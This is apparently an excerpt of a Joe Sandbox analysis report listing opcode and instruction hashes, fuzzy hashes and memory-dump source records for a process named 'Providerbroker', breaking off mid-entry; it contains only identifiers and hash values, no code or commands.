                                                                                    • Instruction ID: 06619289bee2f4923ee478fc65603eba3111ae3ccd0c39968e786d8c1f416f1a
                                                                                    • Opcode Fuzzy Hash: 96275c0db77e8b5782ee6b58a9882f3983f7882c55350684b3022dc5917c00b5
                                                                                    • Instruction Fuzzy Hash: F9312271E0C69A9FE301BBA8C8053FD77A0FF42395F440576C145972D2CBB82449CB99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bd10765135741edb6ced13177dc7797ce27db113b6441910e88e8aac6ce4b179
                                                                                    • Instruction ID: 3fe361b43de5a61f58b56535c1ec52ebbc2c0c536307742c94762b35483019ab
                                                                                    • Opcode Fuzzy Hash: bd10765135741edb6ced13177dc7797ce27db113b6441910e88e8aac6ce4b179
                                                                                    • Instruction Fuzzy Hash: 00310B3092C68A8FEBA8EF648C455FD77B1FF67350F61007AD42ED2281DB39A9009B45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 62563ff0772575714063a3d2eb55d144192b15d532ad7b92a6a75135f0989458
                                                                                    • Instruction ID: 7e0bfc9881bcd547ba796a1da81fdf2d97b719d3d6b0c711e9dcd2f4a532be25
                                                                                    • Opcode Fuzzy Hash: 62563ff0772575714063a3d2eb55d144192b15d532ad7b92a6a75135f0989458
                                                                                    • Instruction Fuzzy Hash: AC312B1095C6E64EF33AAB144C605747F95EF52359B3946FAC8ABCB4C7C82CBD818341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94b4259352118646aadc0957f28f74a7cff589487d36e274c66023e5cc75e688
                                                                                    • Instruction ID: 48a8211a9f46d2ff3aa8316b794c488983391b92ac71f2f3e362970d81053405
                                                                                    • Opcode Fuzzy Hash: 94b4259352118646aadc0957f28f74a7cff589487d36e274c66023e5cc75e688
                                                                                    • Instruction Fuzzy Hash: DF115722C4D9CA0FF72AAB3898211E53BF1EF86384F1A41F6D05CCB087DD19A8058381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b49d9e3a594ea974ce4c67a5d2dd8dc39674e274c4833c46a36f3646861b8bf5
                                                                                    • Instruction ID: dc7345ec1243225f04da02b67debd4c0b2879725d1734069a068590525a60b6e
                                                                                    • Opcode Fuzzy Hash: b49d9e3a594ea974ce4c67a5d2dd8dc39674e274c4833c46a36f3646861b8bf5
                                                                                    • Instruction Fuzzy Hash: EC21EA31E1895D9FDF98EF68D865AEDB7F1FF58314F1001AAD01EE3291CA35A9818B40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 56f5cea710a63a5ede3e4703f2ed32853e1861481de5eea327cdd2638d4a1c69
                                                                                    • Instruction ID: d967c68d3d48cd93a0c88fb3361621236eb8b40116f95fcd94f0dd3dd498a925
                                                                                    • Opcode Fuzzy Hash: 56f5cea710a63a5ede3e4703f2ed32853e1861481de5eea327cdd2638d4a1c69
                                                                                    • Instruction Fuzzy Hash: D121FC30E1895D9FDF98EF18D895AACB7B1FF58310F1001A9D01EE3291CE35A941CB44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 288bc2db4c7327307efccf0691fe4b85b7dbfb3eeead86597a514a43d4e5d762
                                                                                    • Instruction ID: bdee2c3715e0e05c3f6b79c113a3c4f77ad5beb49ca4634e3bec0852693cbba9
                                                                                    • Opcode Fuzzy Hash: 288bc2db4c7327307efccf0691fe4b85b7dbfb3eeead86597a514a43d4e5d762
                                                                                    • Instruction Fuzzy Hash: 9221E470E1895D9FDFA8EF58C855AACB7B1FB58304F1041AAD01EE3291CB34A9818B40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e6a20a2aa65f1922104b77b083193e3c87e99c133cfdae34dfd48871c73f0a4
                                                                                    • Instruction ID: 92d81419d846525dea569061d9d6153f42a2222a3f955b8c8f461cf80bbf2314
                                                                                    • Opcode Fuzzy Hash: 3e6a20a2aa65f1922104b77b083193e3c87e99c133cfdae34dfd48871c73f0a4
                                                                                    • Instruction Fuzzy Hash: C8210831D4EB9ADFDB65EF78D8504FD7BA0EF02364B2500B6D099AB083DE256805C744
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0223dd0aa126536251d54603f0b49c0bd3c4e462ccd2d5af3bc6cd0f22ef0c6
                                                                                    • Instruction ID: be05b4ab81483ea0f47c0f906119b160dc2516ee00cd3cd04659524193fb0faf
                                                                                    • Opcode Fuzzy Hash: e0223dd0aa126536251d54603f0b49c0bd3c4e462ccd2d5af3bc6cd0f22ef0c6
                                                                                    • Instruction Fuzzy Hash: 07213C30A1881D9FDB84FBA8C889AADB3F1FF68344F10057AD409D3295EF35A941CB54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a9dc4d8485ebe923238afcd15bbc46373773fee01b88e9215212cd7bbaf4cfdf
                                                                                    • Instruction ID: e99ab2fae1a43ab8d330e1951ca43e7eb2bec67e508ac9dfcbe2cb5d46c8c335
                                                                                    • Opcode Fuzzy Hash: a9dc4d8485ebe923238afcd15bbc46373773fee01b88e9215212cd7bbaf4cfdf
                                                                                    • Instruction Fuzzy Hash: 32119D91D4D5D38EF6397E65AE611B82E70AF45BD8F3A01BAD43E8A1C3CC4C28452396
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cf60d2ffa77e99c73c55d35db809ee9f8a7a06260bd041e225b1a24c39971af
                                                                                    • Instruction ID: a4d85f66e7a05cfdc4bc0524869cd5af5519eba59ef9716ca95314dc9b859e12
                                                                                    • Opcode Fuzzy Hash: 6cf60d2ffa77e99c73c55d35db809ee9f8a7a06260bd041e225b1a24c39971af
                                                                                    • Instruction Fuzzy Hash: E5110621A1CD499EEA64FF6890515FA73D5FFA4390F104A3AD15EC30C2DE18E80583C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19c0ac59f16687c439631d688aa72fa9be57550f49c85a066ae2bfc3788c236f
                                                                                    • Instruction ID: c83f6913faf5ae1ad146f546ef5859fd9b9abf257ba719a9ebffca43b2be19bb
                                                                                    • Opcode Fuzzy Hash: 19c0ac59f16687c439631d688aa72fa9be57550f49c85a066ae2bfc3788c236f
                                                                                    • Instruction Fuzzy Hash: 4801F531E0C58A5FF7746A6859082BD3699DF463C8F220539F01FE7181CDA87C058751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f006098442945df4c24ae599cfaa3ac5495887d214d242366228d8594571875d
                                                                                    • Instruction ID: 372d35650e3c5806da28e78dfb40ea88d1e299c89c0737f4f2056b2c2200d00c
                                                                                    • Opcode Fuzzy Hash: f006098442945df4c24ae599cfaa3ac5495887d214d242366228d8594571875d
                                                                                    • Instruction Fuzzy Hash: AE11443220C84A8FF718AF5CD4406E97395FFE53A4F24456ADA69C31C0CA28E81187C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9236eb98b00d8036a9b263456bb270d75a3025997751399d26360afc6144c210
                                                                                    • Instruction ID: c29a15901b3ed9b64f2a5c779e709a2ad2ed66a296407fb45ccf25a613b46d4e
                                                                                    • Opcode Fuzzy Hash: 9236eb98b00d8036a9b263456bb270d75a3025997751399d26360afc6144c210
                                                                                    • Instruction Fuzzy Hash: B501893220C0858FF714AF5CE8543F97394EFE5354F24057BE569C32D1CA19984087C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 25a68b3aa03c8aaf3e4ed8f52aad1b311328eb9bf48758bf706ce74b2b3b19a4
                                                                                    • Instruction ID: e2be15ab6fe5c28377d6b6cbf9025dc85410aca51ea3a6c3d1409ffa50af1499
                                                                                    • Opcode Fuzzy Hash: 25a68b3aa03c8aaf3e4ed8f52aad1b311328eb9bf48758bf706ce74b2b3b19a4
                                                                                    • Instruction Fuzzy Hash: 9501FC71F0C68AAFE734AE6868191BD36A9EF553D0F214439D01FE3190DE6968458B44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84ad7a9a4c177090245bb8fcafeb53cc98f76aa4a89ad42d83526dfd81f1d00f
                                                                                    • Instruction ID: 020cfbbe8621c586a4a4a2234f856644943ab0a51ed9c887cfe10f3c1954856d
                                                                                    • Opcode Fuzzy Hash: 84ad7a9a4c177090245bb8fcafeb53cc98f76aa4a89ad42d83526dfd81f1d00f
                                                                                    • Instruction Fuzzy Hash: 9C01F571D0D69A9FE701FB64C8002EA7770FF42354F044576D101972D2CB782154C785
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aaf2384227a5ad68c30241b4413dc1940ce7619e2d0409f7afab7c5815c5e1f1
                                                                                    • Instruction ID: e56d4f89f885a574f883dd06c80cfd92460a0e98d9e665a9e7855acd5824bf80
                                                                                    • Opcode Fuzzy Hash: aaf2384227a5ad68c30241b4413dc1940ce7619e2d0409f7afab7c5815c5e1f1
                                                                                    • Instruction Fuzzy Hash: 1601DF70D0D69A9EE701FBA4C8442EABBB0FF42354F044576D51197292CFB82254C789
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 801fee1a5fe24df0e9faea08d5db82ef75198dc859f304d0f554a1391c9554a3
                                                                                    • Instruction ID: 568191bf873e619b47965e91b6c81e68488cf95ecbb7beff7cd0e5dfd63241f6
                                                                                    • Opcode Fuzzy Hash: 801fee1a5fe24df0e9faea08d5db82ef75198dc859f304d0f554a1391c9554a3
                                                                                    • Instruction Fuzzy Hash: C101A222D0CAC68FF2B9AE245D611B47BA1EF14344F2A02FAC05EC65C3DD186C848791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e4202e0276aaf3448294fc618c83cf26a483e4e91d29ad3632663af074590162
                                                                                    • Instruction ID: a232b77c4f04dd25ce9bab82acddd8018894f5a019e4de03debb755382645834
                                                                                    • Opcode Fuzzy Hash: e4202e0276aaf3448294fc618c83cf26a483e4e91d29ad3632663af074590162
                                                                                    • Instruction Fuzzy Hash: 8401A874908A4D9FDF84EF58D448AAE7BF1FF68345F00056AE419D7250DB30E994CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4a71229f5d9cc9fa8c6b8d2c6461f87f2f4b43c69833ac538d97c86774ddae8b
                                                                                    • Instruction ID: 4dc7b912f084ade65e5346f99a13bc1b14d562f94b0a674442678b6949ad2644
                                                                                    • Opcode Fuzzy Hash: 4a71229f5d9cc9fa8c6b8d2c6461f87f2f4b43c69833ac538d97c86774ddae8b
                                                                                    • Instruction Fuzzy Hash: 0401E470A2864DCFCB84EF18C881AA97BE0FF58344F0002A5E849D3250CB30E961CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2cf38cf1c45e4133a082d8a2e0cd509244e9d98cc19fb2bccc460a523da64629
                                                                                    • Instruction ID: 08462b3ff3172068495e6aaeb4463f68499934673fca3ac12f448f66ec851027
                                                                                    • Opcode Fuzzy Hash: 2cf38cf1c45e4133a082d8a2e0cd509244e9d98cc19fb2bccc460a523da64629
                                                                                    • Instruction Fuzzy Hash: 6A015474908A5DCFDF69EF98C895AACBBB1FF68745F20019DC00AEB251CA31A941DF00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 861e917cb9153f1495443fdfe3902eec180aa32675911af4fef3c708f2320226
                                                                                    • Instruction ID: 8d14fe7c53a4de3e5c1ec5598d8cd3babe964ab58e63037ea2308af0b86dac72
                                                                                    • Opcode Fuzzy Hash: 861e917cb9153f1495443fdfe3902eec180aa32675911af4fef3c708f2320226
                                                                                    • Instruction Fuzzy Hash: 13F0C23184D3C59FE722EF70CC155E53FA0AF43344B1A00FAE4568B0A2C62D5616C761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 765141b45a9c288535c84361673dc652bf16e4e22e58b227ed8d83a1441d0099
                                                                                    • Instruction ID: c17cb9fd02854cf4cb04c599c32fc93c220d6a54dd3ffda83df756eb22950858
                                                                                    • Opcode Fuzzy Hash: 765141b45a9c288535c84361673dc652bf16e4e22e58b227ed8d83a1441d0099
                                                                                    • Instruction Fuzzy Hash: 3FF0F63144E3C59FE312AF709C118E53FB4EF03254F2901F6D066CB0A2C92D160AC751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4f506c26fa0d63254503f78c07b18a803e30fe441dd73150ec13b41e9ebdb4ca
                                                                                    • Instruction ID: 61f07ee4f759ac68456c201a0cf599a917cad416d036128ebe06aeabd812b26a
                                                                                    • Opcode Fuzzy Hash: 4f506c26fa0d63254503f78c07b18a803e30fe441dd73150ec13b41e9ebdb4ca
                                                                                    • Instruction Fuzzy Hash: 49F0303191960D9FEB80FF68D4496ED77A0FF94345F500576E81CD2191DB74A1A0CB85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf0912adf7d165dd49226dcb41adf0e7620098235a270ffbaec063e7f8a632c4
                                                                                    • Instruction ID: 0ddb835b05a8271d61a963fa762cebc8b232cad9c7928d24dde426f56dba1e60
                                                                                    • Opcode Fuzzy Hash: cf0912adf7d165dd49226dcb41adf0e7620098235a270ffbaec063e7f8a632c4
                                                                                    • Instruction Fuzzy Hash: A9F01530918A4E9FEB80FF68D8496EE7BE4FF58345F400576E81DD2191DB34A6A0CB85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                    • Instruction ID: bc6c0be2221bf5ad24e2b354070bcef05bc77c885255a051dc84a05d65b1aacc
                                                                                    • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                    • Instruction Fuzzy Hash: A3F0D47490A99CDFCF55EBA8C85AE99BBB0FF68300F1001DDD00ADB262CA319845CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6d9b55605b2e1e2743ab002c27dce042b618df8265e9890561be665cb1f11c11
                                                                                    • Instruction ID: da8ec76502c4b5bd023fdcc022d68e5d531e4ac3c4ff6cc8fa8ae99df931fee9
                                                                                    • Opcode Fuzzy Hash: 6d9b55605b2e1e2743ab002c27dce042b618df8265e9890561be665cb1f11c11
                                                                                    • Instruction Fuzzy Hash: DEE04F3681E2C98FF771EF108E560EC7F70BF11384F6A01EBD51987192EB296A189652
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eaa338f200561165a6c3085338d3ba75f83e77cdbc1ca81ffc1e19d176b7739d
                                                                                    • Instruction ID: 704f869680f387df31c11781de1905de1bd1973417dcda9757efa328c57cf734
                                                                                    • Opcode Fuzzy Hash: eaa338f200561165a6c3085338d3ba75f83e77cdbc1ca81ffc1e19d176b7739d
                                                                                    • Instruction Fuzzy Hash: 3FE01211E0D2C28FF7765B345D605787FD09F0B3C87660AB9D15E9B2C3D99538049711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3446c91fa6359a97e0c82b05bc6409d70efd09c66479bfef8928a9de9b9b42f3
                                                                                    • Instruction ID: 3620c5ced7446f6b12f1c6e0febe257d57ff39341f6fbe5bc021d348d2a1a5dc
                                                                                    • Opcode Fuzzy Hash: 3446c91fa6359a97e0c82b05bc6409d70efd09c66479bfef8928a9de9b9b42f3
                                                                                    • Instruction Fuzzy Hash: E1E0EC70D0991D9EE775EA18DC903E97671EB84315F1042F5800E96189CA341E828F80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                                    • Instruction ID: 975bc405a72ff7f58ff1edd9084ca05f0e8470a30ebf7ccba6a5caef0da938f2
                                                                                    • Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                                    • Instruction Fuzzy Hash: D6D0C914B1D6EB8DF6397F418960E3951956F01389E32403EC17F819C1CE2CB5016215
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                                    • Instruction ID: 1cb5dc69c692584d5fc2a98f51da72e93af739a075a0b612925f887f6e88bf90
                                                                                    • Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                                    • Instruction Fuzzy Hash: 85D01220A1D5C38DF7387E01CE2223E65A15F4238CE36003EE07F429C1CD1C78017A11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                                    • Instruction ID: 5a059c1133121bd8009b678d37dfd3208b5d3bfb59b497f1d0288c36a6fa72cd
                                                                                    • Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                                    • Instruction Fuzzy Hash: 86C04C10F0D2D39FFA317A644C61A3826911F0B388B660A71D11A8A3C3D858B8445651
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3b7e26661d562f86fa5596e82ef91eaa7f0b6858be83bb676246a7734c04b017
                                                                                    • Instruction ID: cb23af0f9e202f632862b9b12add299b023d8482ec39a830b9bd0bd227f75172
                                                                                    • Opcode Fuzzy Hash: 3b7e26661d562f86fa5596e82ef91eaa7f0b6858be83bb676246a7734c04b017
                                                                                    • Instruction Fuzzy Hash: DF415830D0CA8D8FCF55EF68C891AADBBB1FF5A344F2401AAD418D7282CB35A945CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c8a3733e8af488a75a4cd3bf0e3c0b1184f6dd9f0d54d6cfeb38d661fa60b29
                                                                                    • Instruction ID: 38428c2373bd7d0c9ef459a1674d533c5f4ccfa5a826fb25affea467d0d876e3
